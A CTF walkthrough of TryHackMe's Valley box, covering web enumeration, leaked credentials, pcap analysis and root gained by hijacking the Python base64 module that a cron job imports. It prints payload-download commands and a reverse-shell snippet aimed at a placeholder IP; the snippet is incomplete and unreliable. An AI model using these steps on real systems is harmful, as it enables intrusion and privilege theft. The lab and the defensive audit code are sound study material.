Writeup: Valley CTF

Valley CTF from TryHackMe includes many essential cybersecurity topics, like:

  • Confidential information exposure;
  • PCAP analysis;
  • Reverse engineering of an ELF executable;
  • Horizontal privilege escalation;
  • Python module hijacking;
  • Vertical privilege escalation.

1. Port scanning

Common ports, also known as ‘Well-known Ports’ or ‘Registered Ports’, are numbered ports that have been assigned by the Internet Assigned Numbers Authority (IANA) for specific services and widely used protocols. These ports are numbered from 0 to 1023 and are reserved for common and widely recognized services.

However, after running a complete TCP scan with nmap, I noticed an unusual open port. Take a look below.

Nmap TCP scan result

Port 37370 is open, running an FTP server. I checked for vulnerabilities in vsftpd 3.0.3 but didn’t find anything relevant. I also attempted, without success, to exploit the FTP server’s anonymous login functionality to see if there were any files available. Other than that, there was nothing out of the ordinary: port 22 is running SSH (unfortunately, we don’t have valid credentials yet) and port 80 is running HTTP, which will be our focus from now on.

2. Exploring the web server

The main page doesn’t provide much relevant information, and there isn’t anything interesting in the page source code so far.

Therefore, I ran feroxbuster with the common dirb wordlist, just to get a general overview of the website’s structure.

Feroxbuster scan result

After analyzing all the endpoints thoroughly, the ones that provided interesting information were: /static/ and /pricing/note.txt

————— /pricing/note.txt —————
Please stop leaving notes randomly on the website
————— End of content —————

The /static/ endpoint is where, theoretically, all the images from /gallery/gallery.html are stored, so it should be a directory index listing those images. Instead, it presents itself as a directory index but doesn’t list any content, even though there are images at /static/1 to /static/18. Strange.

Keeping that in mind, I ran feroxbuster again, but this time with a more powerful wordlist directly targeting the /static/ endpoint.

Feroxbuster scan result at /static

After scanning for a while, the entry /static/00 appeared. In addition to discovering a valid system user (valleyDev), I was able to access a hidden login portal in an unauthorized manner.

Hidden login portal

Before trying anything else, it’s always important to read the source code to get a more in-depth understanding of what is really going on behind the scenes. The page calls a script named dev.js; take a look at its code:

Hard-coded credentials

This JS script is responsible for authenticating the user through the login form, and we can see that there is no connection to a database or anything of the sort. The user’s input in the form is directly compared with the correct credentials on the client-side, which means we can view the username and password. Following the CTF standard, I censored the password ‘siemDev’ in the image so that you can try it yourself.

Once we logged in (we could have also directly accessed the endpoint present in the script above, /dev1243224123123/devNotes37370.txt), we were redirected to a page that seems to be a developer’s note. Among other things, the developer mentions the need to stop reusing credentials. With that in mind, I attempted, without success, to log in as siemDev via SSH. However, shortly after, I successfully logged in to the FTP server.

3. Exploring the FTP server

Connecting to the FTP server and extracting all available files

4. Traffic capture analysis

Wireshark is an open-source protocol analysis tool widely used by network and security professionals.

I downloaded some network traffic files (.pcap) from the FTP server and then, after analyzing them with Wireshark, I obtained detailed information about the packets that were sent and received on a network. I examined the packet contents, headers, and metadata, which revealed a crucial credential for progressing in the CTF.

Network traffic analysis

In the image, you can see that the client made an HTTP request with the POST method to /index.html. However, since it was HTTP and not HTTPS, which is encrypted, the information it sent to the website was exposed. The password has been censored as usual.

To reach the screen shown in the image, simply open the .pcapng file with Wireshark (you can run ‘wireshark file.pcapng’ from the command line), right-click on a packet that uses the TCP protocol (in this case, I saw HTTP requests and found them interesting), hover over ‘Follow,’ and then select ‘TCP Stream’.
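The same exposure can be flagged from the defender's side. The function below is an added example, not part of the original writeup: it takes the bytes of one reassembled client stream, as displayed by Follow > TCP Stream, and reports which credential-like form fields travelled over cleartext HTTP without echoing their values. The sample request, its field names and the keyword list are constructed assumptions.

```python
from urllib.parse import parse_qsl

# Substrings that mark a form field as credential-like (assumed list, extend as needed).
SENSITIVE = ("pass", "pwd", "psw", "secret", "token")

# Constructed sample of a client stream; field names and host are assumptions.
_BODY = b"uname=exampleuser&psw=REDACTED&remember=1"
SAMPLE_STREAM = (
    b"POST /index.html HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY
)


def exposed_credential_fields(stream: bytes):
    """Return (method, path, sensitive field names) for a cleartext HTTP form
    submission, or None. Values are never returned, only the field names."""
    head, sep, body = stream.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    request = lines[0].split(" ")
    if not sep or len(request) != 3 or not request[2].startswith("HTTP/1."):
        return None  # not a complete HTTP/1.x request (TLS traffic ends up here too)
    method, path = request[0], request[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    if method not in ("POST", "PUT") or not ctype.startswith("application/x-www-form-urlencoded"):
        return None
    length = headers.get("content-length", "")
    if length.isdigit():
        body = body[: int(length)]  # ignore pipelined data after this request
    fields = parse_qsl(body.decode("iso-8859-1"), keep_blank_values=True)
    hits = [name for name, _value in fields if any(s in name.lower() for s in SENSITIVE)]
    return (method, path, hits) if hits else None


if __name__ == "__main__":
    print(exposed_credential_fields(SAMPLE_STREAM))
```

A hit from this check means the form should be served only over HTTPS, and any credential that already crossed the wire in cleartext should be rotated.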

5. Initial shell and horizontal privilege escalation

Using the exposed credentials from the network capture file, it is possible to log in via SSH with the user valleyDev. The user.txt flag is located in /home/valleyDev.

The first thing I religiously do upon obtaining an initial shell is find a way to transfer the latest version of linpeas to the machine (see more details below). If I can’t, the option is to search for another script or manually enumerate for privilege escalation vectors.

From the linpeas scan result, I could clearly see that there is a Python script running every 1 minute through a cronjob. Fortunately, my user has permission to read the file content, so I was able to understand better what the script is programmed to do.

  • Get the latest version of linpeas.

[Attacking machine]$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh

  • Then, host a local web server using python.

[Attacking machine]$ python -m http.server 8000

  • On the CTF machine, download linpeas.

[CTF Machine – OPTION 1]$ cd /dev/shm && curl http://YOUR-VPN-IP-ADDRESS:8000/linpeas.sh -o linpeas.sh
[CTF Machine – OPTION 2]$ cd /dev/shm && wget http://YOUR-VPN-IP-ADDRESS:8000/linpeas.sh

Python code running every minute on the CTF machine

The script is not too complex. It imports the base64 module and starts a loop over range(1, 7), building the path of each image by replacing the number in the file name on each iteration. It then opens the image file in byte-read mode, creating a file pointer in image_file, and stores the image data in another variable. The image data is encoded in base64, the script defines the location where the encoded image will be stored, and it opens that location in byte-write mode ("wb") and writes the encoded image data there.

I checked the permissions of the directory to see if I could modify any image in a way that could take advantage of some aspect when the code processes the image, but I can’t change anything. So, I turned my attention to the base64 module that the script is importing at the beginning and started to think if it would be possible to modify that module.

On Linux systems, Python modules are stored in specific directories following a standard hierarchy. External packages and libraries are installed in the “site-packages” directory, which is usually found at a path like “/usr/lib/pythonX.Y/site-packages” (where “X.Y” represents the specific version of Python installed). Each package or library can contain multiple related Python modules, organized into subdirectories.

In this case, the default Python modules are located in /usr/lib/python3.8/, and we can see the existence of the base64 module at /usr/lib/python3.8/base64.py. Checking the permissions of the file, I noticed that the group that owns the file is “valleyAdmin.” Very interesting.

Then, I checked who the members of the valleyAdmin group are, and with that information, I could focus my attention on the user ‘valley.’ The file ‘valleyAuthenticator’ in /home/valleyAuthenticator is at least unusual, and to make it even better, the owner of the file is ‘valley.’ Let’s take a closer look at this file.

Transferring the file to my machine and reading the content

I played around with the executable before doing this print procedure, but I didn’t get any promising results. So, I transferred the file to my machine to be able to perform some reverse engineering techniques. I thought I would need to open Ghidra and go deep into it, but not necessarily. A simple ‘strings’ command worked just fine for me.

Notice that when I filtered for the word ‘pass’ just above, amidst all the nonsensical content, there’s something valuable. What is highlighted in red on the right side of the screenshot is a hash (possibly hiding the user’s password); I realized it as soon as I saw it. I needed to fix it a bit since it wasn’t on a single line, but it was easy to use CrackStation with its rainbow table to crack the hash.

Using crackstation in order to crack the hash

After successfully cracking the hash, I proceeded to execute the binary on the CTF machine, specifying the user as ‘valley’ and using the password I just obtained. And voila! I succeeded. Right after that, I tried logging in as ‘valley’ using the command ‘su valley’, and there you have it! Now, I am valley.

6. Vertical privilege escalation

Now that we are authenticated as valley, we can edit the file /usr/lib/python3.8/base64.py, as we are part of the valleyAdmin group.

Inserting malicious code inside python base64 module

import socket, subprocess, os
s.connect(("IP", 9001))
import pty

When the cronjob runs the script at /photos/script/photosEncrypt.py, the base64 module will be imported, and the code above will be executed along with it. All that’s left is to have a netcat listener running on my machine, and we’re good to go. Remember to change the IP in s.connect(("IP", 9001)) to your VPN’s IP address.

After that, simply save the file and patiently wait for the reverse connection from the machine as root. The root.txt flag is located at /root.
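The misconfiguration used here, a standard library module writable by a non-root group and imported by a root cron job, can be caught with a permissions audit of the interpreter's import directories. The audit below is an added example, not code from the CTF machine or the original writeup; the function names are hypothetical and the demo tree is constructed.

```python
import os
import stat
import sysconfig
import tempfile


def write_risks(path, trusted_uids=(0,)):
    """Reasons why an account outside trusted_uids could modify path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append(f"owner uid {st.st_uid} is not trusted")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"writable by gid {st.st_gid}")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_import_dirs(dirs, trusted_uids=(0,)):
    """Map each directory and .py file under dirs to its write risks, if any."""
    findings = {}
    for top in dirs:
        for root, _subdirs, files in os.walk(top):
            # Directories count too: write access there allows swapping a module.
            paths = [root] + [os.path.join(root, f) for f in files if f.endswith(".py")]
            for path in paths:
                try:
                    reasons = write_risks(path, trusted_uids)
                except OSError:
                    continue  # entry vanished or is a dangling symlink
                if reasons:
                    findings[path] = reasons
    return findings


def demo():
    """Constructed tree: group-writable base64.py; trusts only the current uid."""
    top = tempfile.mkdtemp()
    for name, mode in (("base64.py", 0o664), ("os.py", 0o644)):
        path = os.path.join(top, name)
        open(path, "w").close()  # empty constructed module
        os.chmod(path, mode)
    return top, audit_import_dirs([top], trusted_uids=(os.getuid(),))


if __name__ == "__main__":
    for path, why in audit_import_dirs([sysconfig.get_paths()["stdlib"]]).items():
        print(path, "->", "; ".join(why))
```

Run directly, it audits the running interpreter's standard library with only uid 0 trusted; any finding there should be corrected to root ownership with no group or world write bit.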

7. Conclusion

We hope you have found our content useful, and we invite you to explore more of our website to discover other interesting topics that we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and welcome feedback and suggestions through the contact form. Thank you for choosing BehindSecurity, and we look forward to seeing you again soon!
